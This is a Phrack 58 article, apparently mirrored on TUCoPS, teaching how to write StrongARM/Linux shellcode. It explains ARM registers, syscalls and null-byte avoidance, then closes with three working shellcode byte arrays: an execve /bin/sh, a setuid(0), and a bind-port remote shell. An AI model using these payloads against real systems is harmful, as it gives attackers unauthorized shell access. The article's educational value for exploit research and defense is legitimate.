TUCoPS :: Phrack Inc. Issue #58 :: p58-0x0a.txt

Phrack 58 File 10: Developing StrongARM/Linux shellcode


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3a, Phile #0x0a of 0x0e

|=--------------=[ Developing StrongARM/Linux shellcode ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------=[ funkysh <funkysh@sm.pl> ]=----------------------=|


                             "Into my ARMs"


---[  Introduction


  This paper covers informations needed to write StrongARM Linux shellcode.
All examples presented in this paper was developed on Compaq iPAQ H3650
with Intel StrongARM-1110 processor running Debian Linux. Note that this
document is not a complete ARM architecture guide nor an assembly 
language tutorial, while I hope it also does not contain any major bugs,
it is perhaps worth noting that StrongARM can be not fully compatible
with other ARMs (however, I often refer just to "ARM" when I think it is
not an issue). Document is divided into nine sections:

  * Brief history of ARM
  * ARM architecture
  * ARM registers
  * Instruction set
  * System calls
  * Common operations
  * Null avoiding
  * Example codes
  * References



---[  Brief history of ARM


  First ARM processor (ARM stands for Advanced RISC Machine) was designed
and manufactured by Acorn Computer Group in the middle of 80's. 
Since beginning goal was to construct low cost processor with low power 
consumption, high performance and power efficiency. In 1990 Acorn 
together with Apple Computer set up a new company Advanced RISC Machines
Ltd. Nowadays ARM Ltd does not make processors only designs them and
licenses the design to third party manufacturers. ARM technology is 
currently licensed by number of huge companies including Lucent, 3Com,
HP, IBM, Sony and many others.  

  StrongARM is a result of ARM Ltd and Digital work on design that use the
instruction set of the ARM processors, but which is built with the chip 
technology of the Alpha series. Digital sold off its chip manufacturing
to Intel Corporation. Intel's StrongARM (including SA-110 and SA-1110) 
implements the ARM v4 architecture defined in [1].



---[  ARM architecture
         

  The ARM is a 32-bit microprocessor designed in RISC architecture, that
means it has reduced instruction set in opposite to typical CISC like 
x86 or m68k. Advantages of reduced instruction set includes possibility 
of optimising speed using for example pipelining or hard-wired logic. 
Also instructions and addressing modes can made identical for most 
instructions. ARM is a load/store architecture where data-processing 
operations only operate on register contents, not directly on memory 
contents. It is also supporting additional features like Load and Store
Multiple instructions and conditional execution of all instructions.
Obviously every instruction has the same length of 32 bits.


---[  ARM registers


  ARM has 16 visible 32 bit registers: r0 to r14 and r15 (pc). To simplify
the thing we can say there is 13 'general-purpose' registers - r0 to r12
(registers from r0 to r7 are unbanked registers which means they refers 
to the same 32-bit physical register in all processor modes, they have
no special use and can be used freely wherever an general-purpose 
register is allowed in instruction) and three registers reserved for 
'special' purposes (in fact all 15 registers are general-purpose):
    
   r13 (sp)     -  stack pointer
   r14 (lr)     -  link register
   r15 (pc/psr) -  program counter/status register

  Register r13 also known as 'sp' is used as stack pointer and both with 
link register are used to implement functions or subroutines in ARM
assembly language. The link register - r14 also known as 'lr' is used to 
hold subroutine return address. When a subroutine call is performed by
eg. bl instruction r14 is set to return address of subroutine. Then
subroutine return is performed by copying r14 back into program counter.

  Stack on the ARM grows to the lower memory addresses and stack pointer
points to the last item written to it, it is called "full descending
stack".  For example result of placing 0x41 and then 0x42 on the stack
looks that way:

      memory address   stack value 

                      +------------+
          0xbffffdfc: | 0x00000041 |
                      +------------+
   sp ->  0xbffffdf8: | 0x00000042 |
                      +------------+


---[  Instruction set


  As written above ARM like most others RISC CPUs has fixed-length (in this
case 32 bits wide) instructions. It was also mentioned that all
instructions can be conditional, so in bit representation top 4 bits (31-28)
are used to specify condition under which the instruction is executed.

Instruction interesting for us can be devided into four classes:

  - branch instructions,  
  - load and store instructions,
  - data-processing instructions,
  - exception-generating instructions,

Status register transfer and coprocessor instructions are ommitted here.


 1. Branch instructions
    -------------------

 There are two branch instructions: 

               branch:  b <24 bit signed offset>
 
     branch with link:  bl <24 bit signed offset>
 

Executing 'branch with link' - as mentioned in previous section, results
with setting 'lr' with address of next instruction.


 2. Data-processing instructions
    ----------------------------

Data-processing instructions in general uses 3-address format:
 
 <opcode mnemonic> <destination> <operand 1> <operand 2>

Destination is always register, operand 1 also must be one of r0 to r15
registers, and operand 2 can be register, shifted register or immediate
value.

 Some examples:

  -----------------------------+----------------+--------------------+
              addition:   add  | add r1,r1,#65  | set r1 = r1 + 65   |
          substraction:   sub  | sub r1,r1,#65  | set r1 = r1 - 65   |
           logical AND:   and  | and r0,r1,r2   | set r0 = r1 AND r2 |
  logical exclusive OR:   eor  | eor r0,r1,#65  | set r0 = r1 XOR r2 |
            logical OR:   orr  | orr r0,r1,r2   | set r0 = r1 OR r2  |
                  move:   mov  | mov r2,r0      | set r2 = r0        |


 3. Load and store instructions
    ---------------------------

   
 load register from memory:  ldr rX, <address>    
 
  Example: ldr r0, [r1] load r0 with 32 bit word from address specified 
in r1, there is also ldrb instruction responsible for loading 8 bits,
and analogical instructions for storing registers in memory:
                    
  store register in memory:  str rX, <address>     (store 32 bits)
                             strb rX, <address>    (store 8 bits)

  ARM support also storing/loading of multiple registers, it is quite 
interesting feature from optimization point of view, here go stm (store
multiple registers in memory):

 stm <base register><stack type>(!),{register list}
 
  Base register can by any register, but typically stack pointer is used.
For example: stmfd sp!, {r0-r3, r6} store registers r0, r1, r2, r3 and 
r6 on the stack (in full descending mode - notice additional mnemonic 
"fd" after stm) stack pointer will points to the place where r0 register
is stored.

Analogical instruction to load of multiple registers from memory is: ldm


 4. Exception-generating instructions 
    ---------------------------------

Software interrupt: swi <number> is only interesting for us, it perform
software interrupt exception, it is used as system call.


List of instructions presented in this section is not complete, a full 
set can be obtained from [1].



---[  Syscalls


  On Linux with StrongARM processor, syscall base is moved to 0x900000,
this is not good information for shellcode writers, since we have to deal
with instruction opcode containing zero byte.

Example "exit" syscall looks that way:

               swi 0x900001   [ 0xef900001 ]

Here goes a quick list of syscalls which can be usable when writing 
shellcodes (return value of the syscall is usually stored in r0): 


       execve:
       ------- 
               r0 = const char *filename
               r1 = char *const argv[]
               r2 = char *const envp[]
      call number = 0x90000b
 

       setuid:
       ------- 
               r0 = uid_t uid
      call number = 0x900017


         dup2:
         ----- 
               r0 = int oldfd
               r1 = int newfd
      call number = 0x90003f


       socket:
       ------- 
               r0 = 1 (SYS_SOCKET)
               r1 = ptr to int domain, int type, int protocol
      call number = 0x900066 (socketcall)


         bind:
         ----- 
               r0 = 2 (SYS_BIND)
               r1 = ptr to int  sockfd, struct sockaddr *my_addr, 
                    socklen_t addrlen
      call number = 0x900066 (socketcall)


       listen:
       ------- 
               r0 = 4 (SYS_LISTEN)
               r1 = ptr to int s, int backlog
      call number = 0x900066 (socketcall)


       accept:
       ------- 
               r0 = 5 (SYS_ACCEPT)
               r1 = ptr int s,  struct  sockaddr  *addr,
                    socklen_t *addrlen 
      call number = 0x900066 (socketcall)



---[  Common operations 

 
 Loading high values 
 -------------------

  Because all instructions on the ARM occupies 32 bit word including place
for opcode, condition and register numbers, there is no way for loading
immediate high value into register in one instruction. This problem can
be solved by feature called 'shifting'. ARM assembler use six additional 
mnemonics reponsible for the six different shift types:

           lsl -  logical shift left
           asl -  arithmetic shift left
           lsr -  logical shift right
           asr -  arithmetic shift right
           ror -  rotate right
           rrx -  rotate right with extend

  Shifters can be used with the data processing instructions, or with ldr
and str instruction. For example, to load r0 with 0x900000 we perform 
following operations:
 
         mov   r0, #144           ; 0x90
         mov   r0, r0, lsl #16    ; 0x90 << 16 = 0x900000


 Position independence
 ---------------------

  Obtaining own code postition is quite easy since pc is general-purpose
register and can be either readed at any moment or loaded with 32 bit
value to perform jump into any address in memory. 

For example, after executing:

         sub   r0, pc, #4

address of next instruction will be stored in register r0.

Another method is executing branch with link instruction:
    
         bl    sss
         swi   0x900001
  sss:   mov   r0, lr
  
Now r0 points to "swi 0x900001".

 
 Loops
 -----

  Let's say we want to construct loop to execute some instruction three 
times. Typical loop will be constructed this way:

         mov   r0, #3     <- loop counter
 loop:   ...    
         sub   r0, r0, #1 <- fd = fd -1 
         cmp   r0, #0     <- check if r0 == 0 already
         bne   loop       <- goto loop if no (if Z flag != 1)

This loop can be optimised using subs instruction which will set Z flag
for us when r0 reach 0, so we can eliminate a cmp.

 
         mov   r0, #3
 loop:   ...
         subs  r0, r0, #1
         bne   loop


      
 Nop instruction
 ---------------

  On ARM "mov r0, r0" is used as nop, however it contain nulls so any other
"neutral" instruction have to be used when writting proof of concept codes
for vulnerabilities, "mov r1, r1" is just an example.

         mov   r1, r1    [ 0xe1a01001 ]
          

---[  Null avoiding


  Almost any instruction which use r0 register generates 'zero' on ARM,
this can be usually solved by replacing it with other instruction or
using self-modifing code.

 For example: 
             e3a00041    mov   r0, #65      can be raplaced with:
   
             e0411001    sub   r1, r1, r1
             e2812041    add   r2, r1, #65
             e1a00112    mov   r0, r2, lsl r1  (r0 = r2 << 0)

 Syscall can be patched in following way:

             e28f1004    add   r1, pc, #4    <- get address of swi
             e0422002    sub   r2, r2, r2    
             e5c12001    strb  r2, [r1, #1]  <- patch 0xff with 0x00
             ef90ff0b    swi   0x90ff0b      <- crippled syscall
 
 Store/Load multiple also generates 'zero', even if r0 register is not
 used:
 
             e92d001e    stmfd sp!, {r1, r2, r3, r4}
 
 In example codes presented in next section I used storing with link
 register:

             e04ee00e    sub   lr, lr, lr
             e92d401e    stmfd sp!, {r1, r2, r3, r4, lr}


---[  Example codes


/*
 * 47 byte StrongARM/Linux execve() shellcode
 * funkysh
 */

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
                  "\x1c\x30\x8f\xe2"   /*  add   r3, pc, #28 (0x1c)    */
                  "\x04\x30\x8d\xe5"   /*  str   r3, [sp, #4]          */
                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */
                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */
                  "\x07\x20\xc3\xe5"   /*  strb  r2, [r3, #7           */
                  "\x04\x30\x8f\xe2"   /*  add   r3, pc, #4            */
                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */
                  "\x01\x20\xc3\xe5"   /*  strb  r2, [r3, #1]          */
                  "\x0b\x0b\x90\xef"   /*  swi   0x90ff0b              */
                  "/bin/sh";


/*
 * 20 byte StrongARM/Linux setuid() shellcode
 * funkysh
 */

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
                  "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */
                  "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */
                  "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */
                  "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */


/*
 * 203 byte StrongARM/Linux bind() portshell shellcode
 * funkysh
 */

char shellcode[]= "\x20\x60\x8f\xe2"   /*  add   r6, pc, #32           */
                  "\x07\x70\x47\xe0"   /*  sub   r7, r7, r7            */
                  "\x01\x70\xc6\xe5"   /*  strb  r7, [r6, #1]          */
                  "\x01\x30\x87\xe2"   /*  add   r3, r7, #1            */
                  "\x13\x07\xa0\xe1"   /*  mov   r0, r3, lsl r7        */
                  "\x01\x20\x83\xe2"   /*  add   r2, r3, #1            */
                  "\x07\x40\xa0\xe1"   /*  mov   r4, r7                */
                  "\x0e\xe0\x4e\xe0"   /*  sub   lr, lr, lr            */
                  "\x1c\x40\x2d\xe9"   /*  stmfd sp!, {r2-r4, lr}      */
                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (socket) */
                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
                  "\x35\x70\xc6\xe5"   /*  strb  r7, [r6, #53]         */
                  "\x14\x20\xa0\xe3"   /*  mov   r2, #20               */
                  "\x82\x28\xa9\xe1"   /*  mov   r2, r2, lsl #17       */
                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
                  "\x14\x40\x2d\xe9"   /*  stmfd sp!, {r2,r4, lr}      */
                  "\x10\x30\xa0\xe3"   /*  mov   r3, #16               */
                  "\x0d\x20\xa0\xe1"   /*  mov   r2, sp                */
                  "\x0d\x40\x2d\xe9"   /*  stmfd sp!, {r0, r2, r3, lr} */
                  "\x02\x20\xa0\xe3"   /*  mov   r2, #2                */
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66       (bind) */
                  "\x45\x70\xc6\xe5"   /*  strb  r7, [r6, #69]         */
                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (listen) */
                  "\x5d\x70\xc6\xe5"   /*  strb  r7, [r6, #93]         */
                  "\x01\x20\x82\xe2"   /*  add   r2, r2, #1            */
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
                  "\x04\x70\x8d\xe5"   /*  str   r7, [sp, #4]          */
                  "\x08\x70\x8d\xe5"   /*  str	 r7, [sp, #8]          */
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (accept) */
                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
                  "\x02\x10\xa0\xe3"   /*  mov   r1, #2                */
                  "\x71\x70\xc6\xe5"   /*  strb  r7, [r6, #113]        */
                  "\x15\x07\xa0\xe1"   /*  mov   r0, r5, lsl r7 <dup2> */
                  "\x3f\xff\x90\xef"   /*  swi   0x90ff3f       (dup2) */
                  "\x01\x10\x51\xe2"   /*  subs  r1, r1, #1            */
                  "\xfb\xff\xff\x5a"   /*  bpl   <dup2>                */
                  "\x99\x70\xc6\xe5"   /*  strb  r7, [r6, #153]        */
                  "\x14\x30\x8f\xe2"   /*  add   r3, pc, #20           */
                  "\x04\x30\x8d\xe5"   /*  str	 r3, [sp, #4]          */
                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */
                  "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */
                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */
                  "\x0b\xff\x90\xef"   /*  swi	 0x900ff0b    (execve) */
                  "/bin/sh";


---[  References:


[1] ARM Architecture Reference Manual - Issue D, 
    2000 Advanced RISC Machines LTD

[2] Intel StrongARM SA-1110 Microprocessor Developer's Manual,
    2001 Intel Corporation

[3] Using the ARM Assembler,
    1988 Advanced RISC Machines LTD
    
[4] ARM8 Data Sheet,
    1996 Advanced RISC Machines LTD

|=[ EOF ]=---------------------------------------------------------------=|


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH